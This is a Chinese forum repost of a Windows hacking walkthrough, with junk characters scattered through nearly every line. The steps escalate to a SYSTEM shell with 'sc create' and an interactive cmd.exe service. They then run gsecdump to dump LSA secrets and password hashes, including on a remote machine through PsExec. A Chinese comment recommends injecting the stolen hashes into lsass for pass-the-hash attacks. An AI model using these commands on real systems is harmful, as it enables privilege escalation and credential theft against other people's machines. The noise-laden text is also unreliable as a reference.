o get a DOS Prompt as NT system:; K4 a" [, b3 h5 z( H
7 y# v" k! M% r* X; XC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact3 b6 j; @& w8 U' q' d; r
[SC] CreateService SUCCESS
6 t& ~. e5 G ^) f5 y0 ?, R8 f
( S. h2 e9 r- V, [C:\>sc start shellcmdline+ y+ {& M! V- C0 E7 Z- q. n# u
[SC] StartService FAILED 1053:
7 o' P/ y! }# p+ j; ~2 t2 k
9 P0 _; \: h4 }2 N' Q N3 WThe service did not respond to the start or control request in a timely fashion.! q3 |7 p# ]6 K9 A3 R; q
2 p6 }( [6 `3 _! n! r/ l. W
C:\>sc delete shellcmdline
- z* T9 p- ?7 q$ C F9 g[SC] DeleteService SUCCESS1 C# J0 T6 d2 B% E* l
; J- _4 O) w5 [& }- p6 x# I) e) P
------------' A! f: H7 q. i7 F5 Y% M
; O- k P/ F2 h$ d: Z( T; oThen in the new DOS window:1 X8 A2 ?; v9 Q* j
0 ^0 S& K, W7 W, @2 lMicrosoft Windows XP [Version 5.1.2600]! u( s: w' t/ ^3 A9 c
(C) Copyright 1985-2001 Microsoft Corp.
6 X, i' f' @. \ `# [. f7 b. z6 _/ Q. T# ~3 v3 J
C:\WINDOWS\system32>whoami
& q# Y1 P# p6 m& r( \8 n6 pNT AUTHORITY\SYSTEM; s' l2 b; u: {9 t" I2 v
9 _! I) S: P6 H3 d/ rC:\WINDOWS\system32>gsecdump -h; s" O+ R: e- t/ K6 X8 G4 { @
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
; |3 N9 I0 e0 ~9 ~+ G$ A) }+ G) susage: gsecdump [options]
) L7 {6 g- [, E- y: W
7 e4 y) s6 A. x P% foptions:' h% P& E# s/ m: k- y$ I) M1 O- O9 f
-h [ --help ] show help9 ? P) O* u1 d! i. P8 m/ ^; R
-a [ --dump_all ] dump all secrets
K8 z1 \& c g, d& g. u. |-l [ --dump_lsa ] dump lsa secrets
! q K1 T! v! v# C-w [ --dump_wireless ] dump microsoft wireless connections+ }! h9 C6 H" m/ g m
-u [ --dump_usedhashes ] dump hashes from active logon sessions
' u$ y$ O6 C; W$ t u; \* E3 g1 p-s [ --dump_hashes ] dump hashes from SAM/AD
" |. v6 }3 n' f- |$ g# N% V% Q. ^
5 k' k7 b9 [7 }( ^" O3 W3 B% eAlthough I like to use:7 c) r/ s& p" |6 c
; D. ]( U3 ?& N; |& w0 A7 aPsExec v1.83 - Execute processes remotely0 p. Y$ Q. q, t% a
Copyright (C) 2001-2007 Mark Russinovich3 G5 @. u4 i$ k3 N
Sysinternals - 链接标记[url]www.sysinternals.com[/url]: l5 H+ q+ Q! c: }+ Z& C) E
4 g! v% h8 y' t- @* O2 t3 G
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT- j5 f* n' q) S" s4 h6 s# E" }- I% V2 q
, f4 ^3 c; u: j* ?$ o1 D$ s7 W
to get the hashes from active logon sessions of a remote system.
4 A1 N/ Z& `, \* U
* Y+ L1 p/ `4 U7 JThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
5 B. O D" Q& o/ G5 S7 j. x2 R# x. I$ e
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
6 e# ~+ H4 }4 S' F5 O- n原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
) o- }+ j8 `8 z- T+ K+ D1 Y# y' [8 g1 z+ s3 F- u; V
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
9 c& @2 H: I$ b4 t |
发表于 2012-11-6 21:09:29
收藏
支持
反对